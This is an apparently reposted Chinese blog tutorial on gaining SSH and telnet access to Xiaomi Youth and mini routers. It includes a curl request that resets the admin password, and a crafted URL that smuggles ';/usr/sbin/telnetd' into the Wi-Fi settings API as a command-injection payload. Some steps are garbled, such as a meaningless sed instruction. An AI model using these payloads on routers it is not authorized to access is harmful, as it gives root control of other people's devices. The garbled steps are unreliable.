路由器
最近,一些人发现了一项漏洞,该漏洞允许用户轻松开启小米
路由器青春版的SSH服务。尽管青春版默认开启了SSH服务,但没有提供密码,因此无法登录。然而,这个漏洞也可以用于部分mini
路由器上。要启用SSH服务,首先需要登录
路由器管理界面并记录下链接中的stok参数。请按照以下步骤进行操作:1. 在命令行中输入以下命令(以
linux系统为例):curl -d "oldPwd=&newPwd=" "http://192.168.31.1/cgi-bin/luci/;stok=/api/xqsystem/set_name_pass
word"执行命令后返回一个代码为0的反馈信息,则说明修改成功,并且可以使用新的密码进行登录。关于小米
路由器青春版和mini
路由器上是否启用了SSH服务,请参考以下链接:[链接]需要注意的是,在我最近进行刷机时发现即使是开发版的ROM也没有开启SSH服务。然而,人们仍然找到了新的方法来开启SSH服务。首先,在浏览器中输入
路由器管理界面的地址(例如:192.168.31.1),然后登录后任务栏地址会变为:http://192.168.31.1/cgi-bin/luci/;stok=075a9192918557c27cdbcae2175281d9/web/home#router。将"web/home#router"替换为"/api/xqsystem/set_name_pass
wordoldPwd=当前
路由器管理密码&newPwd=admin",并按回车键。然后会显示一个代码为0的反馈信息,将"web/home#router"替换为"/api/xqnetwork/set_
WIFI_ap?ssid=tia
NBAo&encryption=NONE&enctype=NONE&channel=1%3;%2Fusr%2Fsbin%2Ftelnetd",稍等片刻浏览器会返回一个错误信息:"未能连接到指定
WIFI(Probe timeout)"。现在,您已经成功启用telnet登录以进入
路由器。用户名为root,密码为admin,依次输入以下指令:- 使用sed命令将dropbear文件中的#tb行替换为以下内容:"#tb"。- 启动dropbear服务:/
etc/init.d/dropbear start。- 在nvram中将ssh_en设置为1,并提交修改。通过这些步骤,您可以使用常用的SSH方式登录
路由器。另外还有一种方法是通过一个内部程序计算出密码,但该程序必须运行在
路由器上才能使用,不是很方便。请注意,“简书作者”享有对此文
著作权,并且未经许可不得转载。原文链接:[链接]
